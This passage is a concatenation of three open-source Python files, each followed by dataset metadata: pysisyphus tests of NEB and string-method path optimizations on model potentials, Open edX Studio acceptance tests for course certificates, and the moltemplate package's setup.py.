final = AnaPot.get_geom((1.94101, 3.85427, 0))
geoms = (initial, final)
return geoms
def run_cos_opt(geoms, between, calc_cls,
cos_cls, cos_kwargs,
opt_cls, opt_kwargs):
interpol = Interpolator(geoms, between=between)
images = interpol.interpolate_all()
for image in images:
image.set_calculator(AnaPot())
cos = cos_cls(images, **cos_kwargs)
opt = opt_cls(cos, **opt_kwargs)
opt.run()
return opt
def assert_cos_opt(opt, ref_cycle):
assert opt.is_converged
assert opt.cur_cycle == ref_cycle
@pytest.mark.parametrize(
"opt_cls, opt_kwargs_, neb_kwargs_, ref_cycle, between",
[
(SteepestDescent, {}, {}, 30, 5),
(SteepestDescent, {}, {}, 32, 10),
(ConjugateGradient, {}, {}, 44, 5),
(QuickMin, {"dt": 0.1,}, {}, 27, 5),
(FIRE, {"dt_max": 0.2,}, {}, 42, 5),
(LBFGS, {"gamma_mult": True, }, {}, 12, 5),
])
def test_anapot_neb(opt_cls, opt_kwargs_, neb_kwargs_, ref_cycle, between):
geoms = get_geoms()
neb_kwargs = {
"fix_ends": True,
"k_min": 0.01,
}
neb_kwargs.update(neb_kwargs_)
opt_kwargs = {
}
opt_kwargs.update(opt_kwargs_)
opt = run_cos_opt(geoms, between, AnaPot,
NEB, neb_kwargs,
opt_cls, opt_kwargs)
# ap = animate(opt)
# plt.show()
assert_cos_opt(opt, ref_cycle)
@pytest.mark.parametrize(
"between, param, ref_cycle",
[
(5, "equal", 49),
(10, "equal", 49),
(5, "energy", 41),
(10, "energy", 46),
])
def test_anapot_szts(between, param, ref_cycle):
geoms = get_geoms()
szts_kwargs = {
"fix_ends": True,
"param": param,
}
opt_cls = SteepestDescent
opt_kwargs = {
"max_cycles": 100,
}
opt = run_cos_opt(geoms, between, AnaPot,
SimpleZTS, szts_kwargs,
                      opt_cls, opt_kwargs)
# ap = animate(opt)
# plt.show()
assert_cos_opt(opt, ref_cycle)
def animate(opt):
xlim = (-2, 2.5)
ylim = (0, 5)
levels = (-3, 4, 80)
ap = AnimPlot(AnaPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
return ap
def animate_bare(opt):
xlim = (-2, 2.5)
ylim = (0, 5)
levels = (-3, 4, 80)
ap = AnimPlot(AnaPot(), opt, xlim=xlim, ylim=ylim, levels=levels,
energy_profile=False, colorbar=False, figsize=(8, 6),
save=False, title=False,
)
ap.animate()
return ap
@using("pyscf")
def test_hcn_neb():
run_dict = {
"preopt": {
"max_cycles": 3,
},
"interpol": {
"type": "idpp",
"between": 3,
},
"cos": {
"type": "neb",
},
"opt": {
"type": "qm",
"align": True,
},
"calc": {
"type": "pyscf",
"pal": 2,
"basis": "321g",
},
"geom": {
"type": "cart",
"fn": ["lib:hcn.xyz", "lib:hcn_iso_ts.xyz", "lib:nhc.xyz"],
},
}
results = run_from_dict(run_dict)
assert results.cos_opt.is_converged
assert results.cos_opt.cur_cycle == 18
@pytest.mark.parametrize(
"neb_kwargs, ref_cycle", [
({}, 34),
({"variable_springs": True, "k_min": 0.01, "k_max": 5}, 33),
]
)
def test_neb_springs(neb_kwargs, ref_cycle):
calc = AnaPot()
geoms = calc.get_path(15)
neb = NEB(geoms, **neb_kwargs)
opt = SteepestDescent(neb)
opt.run()
# calc.anim_opt(opt, show=True)
    assert opt.is_converged
    assert opt.cur_cycle == ref_cycle
@pytest.mark.parametrize(
"k, ref_cycle", [
( 500, 70),
( 1000, 56),
( 2000, 62),
( 4000, 78),
]
)
def test_mullerbrown_neb(k, ref_cycle):
geoms = MullerBrownPot().get_path(num=17)
cos = NEB(geoms, k_max=k, k_min=k)
opt_kwargs = {
"max_step": 0.04,
"gamma_mult": True,
"keep_last": 10,
"max_cycles": 100,
}
opt = LBFGS(cos, **opt_kwargs)
opt.run()
assert opt.is_converged
assert opt.cur_cycle == ref_cycle
# calc = MullerBrownPot()
# calc.anim_opt(opt, show=True)
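if __name__ == "__main__":
    # Hedged sketch (not part of the test suite): run a single NEB
    # optimization on the analytic potential and show the animation that the
    # tests above leave commented out.
    opt = run_cos_opt(get_geoms(), 5, AnaPot,
                      NEB, {"fix_ends": True, "k_min": 0.01},
                      SteepestDescent, {})
    animate(opt)
    plt.show()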
|
eljost/pysisyphus
|
tests/test_cos/test_cos.py
|
Python
|
gpl-3.0
| 5,184
|
[
"PySCF"
] |
8201d5d06ac110dab3fb3e5aec50f6c3d736863488a980a4611e686d82b138ac
|
"""
Acceptance tests for Studio's Setting pages
"""
import re
from .base_studio_test import StudioCourseTest
from ...pages.studio.settings_certificates import CertificatesPage
class CertificatesTest(StudioCourseTest):
"""
Tests for settings/certificates Page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(CertificatesTest, self).setUp(is_staff=True)
self.certificates_page = CertificatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
def make_signatory_data(self, prefix='First'):
"""
Makes signatory dict which can be used in the tests to create certificates
"""
return {
'name': '{prefix} Signatory Name'.format(prefix=prefix),
'title': '{prefix} Signatory Title'.format(prefix=prefix),
'organization': '{prefix} Signatory Organization'.format(prefix=prefix),
}
def create_and_verify_certificate(self, course_title_override, existing_certs, signatories):
"""
Creates a new certificate and verifies that it was properly created.
"""
self.assertEqual(existing_certs, len(self.certificates_page.certificates))
if existing_certs == 0:
self.certificates_page.wait_for_first_certificate_button()
self.certificates_page.click_first_certificate_button()
else:
self.certificates_page.wait_for_add_certificate_button()
self.certificates_page.click_add_certificate_button()
certificate = self.certificates_page.certificates[existing_certs]
# Set the certificate properties
certificate.course_title = course_title_override
# add signatories
added_signatories = 0
for idx, signatory in enumerate(signatories):
certificate.signatories[idx].name = signatory['name']
certificate.signatories[idx].title = signatory['title']
certificate.signatories[idx].organization = signatory['organization']
certificate.signatories[idx].upload_signature_image('Signature-{}.png'.format(idx))
added_signatories += 1
if len(signatories) > added_signatories:
certificate.click_add_signatory_button()
# Save the certificate
self.assertEqual(certificate.get_text('.action-primary'), "Create")
certificate.click_create_certificate_button()
self.assertIn(course_title_override, certificate.course_title)
return certificate
def test_no_certificates_by_default(self):
"""
Scenario: Ensure that message telling me to create a new certificate is
shown when no certificate exist.
Given I have a course without certificates
When I go to the Certificates page in Studio
Then I see "You have not created any certificates yet." message and
a link with text "Set up your certificate"
"""
self.certificates_page.visit()
self.assertTrue(self.certificates_page.no_certificates_message_shown)
self.assertIn(
"You have not created any certificates yet.",
self.certificates_page.no_certificates_message_text
)
self.assertIn(
"Set up your certificate",
self.certificates_page.new_certificate_link_text
)
    def test_can_create_and_edit_certificate(self):
"""
Scenario: Ensure that the certificates can be created and edited correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set new the course title override and signatory and click the button 'Create'
Then I see the new certificate is added and has correct data
When I edit the certificate
And I change the name and click the button 'Save'
Then I see the certificate is saved successfully and has the new name
"""
self.certificates_page.visit()
self.certificates_page.wait_for_first_certificate_button()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first'), self.make_signatory_data('second')]
)
# Edit the certificate
certificate.click_edit_certificate_button()
certificate.course_title = "Updated Course Title Override 2"
self.assertEqual(certificate.get_text('.action-primary'), "Save")
certificate.click_save_certificate_button()
self.assertIn("Updated Course Title Override 2", certificate.course_title)
def test_can_delete_certificate(self):
"""
Scenario: Ensure that the user can delete certificate.
Given I have a course with 1 certificate
And I go to the Certificates page
When I delete the Certificate with name "New Certificate"
Then I see that there is no certificate
When I refresh the page
Then I see that the certificate has been deleted
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first'), self.make_signatory_data('second')]
)
certificate.wait_for_certificate_delete_button()
self.assertEqual(len(self.certificates_page.certificates), 1)
# Delete the certificate we just created
certificate.click_delete_certificate_button()
self.certificates_page.click_confirmation_prompt_primary_button()
# Reload the page and confirm there are no certificates
self.certificates_page.visit()
self.assertEqual(len(self.certificates_page.certificates), 0)
    def test_can_create_and_edit_signatories_of_certificate(self):
"""
Scenario: Ensure that the certificates can be created with signatories and edited correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set new the course title override and signatory and click the button 'Create'
Then I see the new certificate is added and has one signatory inside it
When I click 'Edit' button of signatory panel
And I set the name and click the button 'Save' icon
Then I see the signatory name updated with newly set name
When I refresh the certificates page
Then I can see course has one certificate with new signatory name
When I click 'Edit' button of signatory panel
And click on 'Close' button
Then I can see no change in signatory detail
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first')]
)
self.assertEqual(len(self.certificates_page.certificates), 1)
# Edit the signatory in certificate
signatory = certificate.signatories[0]
signatory.edit()
signatory.name = 'Updated signatory name'
signatory.title = 'Update signatory title'
signatory.organization = 'Updated signatory organization'
signatory.save()
self.assertEqual(len(self.certificates_page.certificates), 1)
        # Refresh the page so it has the updated certificate object.
self.certificates_page.refresh()
signatory = self.certificates_page.certificates[0].signatories[0]
self.assertIn("Updated signatory name", signatory.name)
self.assertIn("Update signatory title", signatory.title)
self.assertIn("Updated signatory organization", signatory.organization)
signatory.edit()
signatory.close()
self.assertIn("Updated signatory name", signatory.name)
def test_can_cancel_creation_of_certificate(self):
"""
Scenario: Ensure that creation of a certificate can be canceled correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set name of certificate and click the button 'Cancel'
Then I see that there is no certificates in the course
"""
self.certificates_page.visit()
self.certificates_page.click_first_certificate_button()
certificate = self.certificates_page.certificates[0]
certificate.course_title = "Title Override"
certificate.click_cancel_edit_certificate()
self.assertEqual(len(self.certificates_page.certificates), 0)
def test_line_breaks_in_signatory_title(self):
"""
Scenario: Ensure that line breaks are properly reflected in certificate
Given I have a certificate with signatories
When I add signatory title with new line character
Then I see line break in certificate title
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[
{
'name': 'Signatory Name',
'title': 'Signatory title with new line character \n',
'organization': 'Signatory Organization',
}
]
)
certificate.wait_for_certificate_delete_button()
# Make sure certificate is created
self.assertEqual(len(self.certificates_page.certificates), 1)
signatory_title = self.certificates_page.get_first_signatory_title()
self.assertNotEqual([], re.findall(r'<br\s*/?>', signatory_title))
|
vikas1885/test1
|
common/test/acceptance/tests/studio/test_studio_settings_certificates.py
|
Python
|
agpl-3.0
| 9,745
|
[
"VisIt"
] |
d600d27d01125328b1a67db5d5efec2037e044962be24702c183175d9fac6094
|
from setuptools import setup
setup(
name='moltemplate',
packages=['moltemplate',
'moltemplate.nbody_alt_symmetry'],
package_dir={'moltemplate': 'moltemplate'}, #.py files are in "moltemplate/"
package_data={'moltemplate': ['force_fields/*.lt']}, #.lt files are in "moltemplate/force_fields/"
#package_data={'moltemplate/force_fields':['*.lt']}
#
#package_data={'moltemplate/force_fields':
# ['compass_published.lt',
# 'cooke_deserno_lipid.lt',
# 'gaff2.lt',
# 'gaff.lt',
# 'graphene.lt',
# 'graphite.lt',
# 'loplsaa.lt',
# 'martini.lt',
# 'oplsaa.lt',
# 'sdk.lt',
# 'spce_ice_rect16.lt',
# 'spce_ice_rect32.lt',
# 'spce_ice_rect8.lt',
# 'spce.lt',
# 'tip3p_1983_charmm.lt',
# 'tip3p_1983.lt',
# 'tip3p_2004.lt',
# 'tip5p.lt',
# 'trappe1998.lt',
# 'watmw.lt']},
description='A general cross-platform text-based molecule builder for LAMMPS',
long_description='Moltemplate is a general cross-platform text-based molecule builder for LAMMPS and ESPResSo. Moltemplate was intended for building custom coarse-grained molecular models, but it can be used to prepare realistic all-atom simulations as well. It supports a variety of force fields for all-atom and coarse-grained modeling (including many-body forces and non-point-like particles). New force fields and examples are added continually by users. NOTE: Downloading moltemplate from pypi using PIP will omit all examples and documentation. Examples and documentation are available at https://moltemplate.org and https://github.com/jewettaij/moltemplate.',
author='Andrew Jewett',
author_email='jewett.aij@gmail.com',
url='https://github.com/jewettaij/moltemplate',
download_url='https://github.com/jewettaij/moltemplate/archive/v2.20.3.zip',
version='2.20.3',
keywords=['simulation', 'LAMMPS', 'molecule editor', 'molecule builder',
'ESPResSo'],
license='MIT',
classifiers=['Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Unix Shell',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'Topic :: Multimedia :: Graphics :: 3D Modeling',
'Intended Audience :: Science/Research'],
scripts=['moltemplate/scripts/moltemplate.sh',
'moltemplate/scripts/cleanup_moltemplate.sh',
'moltemplate/scripts/molc.sh',
'moltemplate/scripts/pdb2crds.awk',
'moltemplate/scripts/emoltemplate.sh'],
entry_points={
'console_scripts': [
'ttree.py=moltemplate.ttree:main',
'ttree_render.py=moltemplate.ttree_render:main',
'bonds_by_type.py=moltemplate.bonds_by_type:main',
'charge_by_bond.py=moltemplate.charge_by_bond:main',
'dump2data.py=moltemplate.dump2data:main',
'extract_espresso_atom_types.py=moltemplate.extract_espresso_atom_types:main',
'extract_lammps_data.py=moltemplate.extract_lammps_data:main',
'ettree.py=moltemplate.ettree:main',
'genpoly_lt.py=moltemplate.genpoly_lt:main',
'genpoly_modify_lt.py=moltemplate.genpoly_modify_lt:main',
'interpolate_curve.py=moltemplate.interpolate_curve:main',
'ltemplify.py=moltemplate.ltemplify:main',
'lttree.py=moltemplate.lttree:main',
'lttree_check.py=moltemplate.lttree_check:main',
'lttree_postprocess.py=moltemplate.lttree_postprocess:main',
'nbody_by_type.py=moltemplate.nbody_by_type:main',
'nbody_fix_ttree_assignments.py=moltemplate.nbody_fix_ttree_assignments:main',
'nbody_reorder_atoms.py=moltemplate.nbody_reorder_atoms:main',
'pdbsort.py=moltemplate.pdbsort:main',
'postprocess_input_script.py=moltemplate.postprocess_input_script:main',
'postprocess_coeffs.py=moltemplate.postprocess_coeffs:main',
'raw2data.py=moltemplate.raw2data:main',
'recenter_coords.py=moltemplate.recenter_coords:main',
'remove_duplicate_atoms.py=moltemplate.remove_duplicate_atoms:main',
'remove_duplicates_nbody.py=moltemplate.remove_duplicates_nbody:main',
'renumber_DATA_first_column.py=moltemplate.renumber_DATA_first_column:main']},
install_requires=[
'numpy',
],
zip_safe=True,
include_package_data=True
)
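# Hedged usage note (not part of the original setup script): installing from
# a source checkout, e.g. with "pip install .", puts the console_scripts
# entry points above (ttree.py, ltemplify.py, ...) on the PATH alongside the
# shell scripts listed in `scripts` (moltemplate.sh and friends).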
|
jewettaij/moltemplate
|
setup.py
|
Python
|
mit
| 4,930
|
[
"ESPResSo",
"LAMMPS"
] |
5decf54ca8bc37ba19ab6e57ed88178f8c72d9b505feadbe58339ee20c54f190
|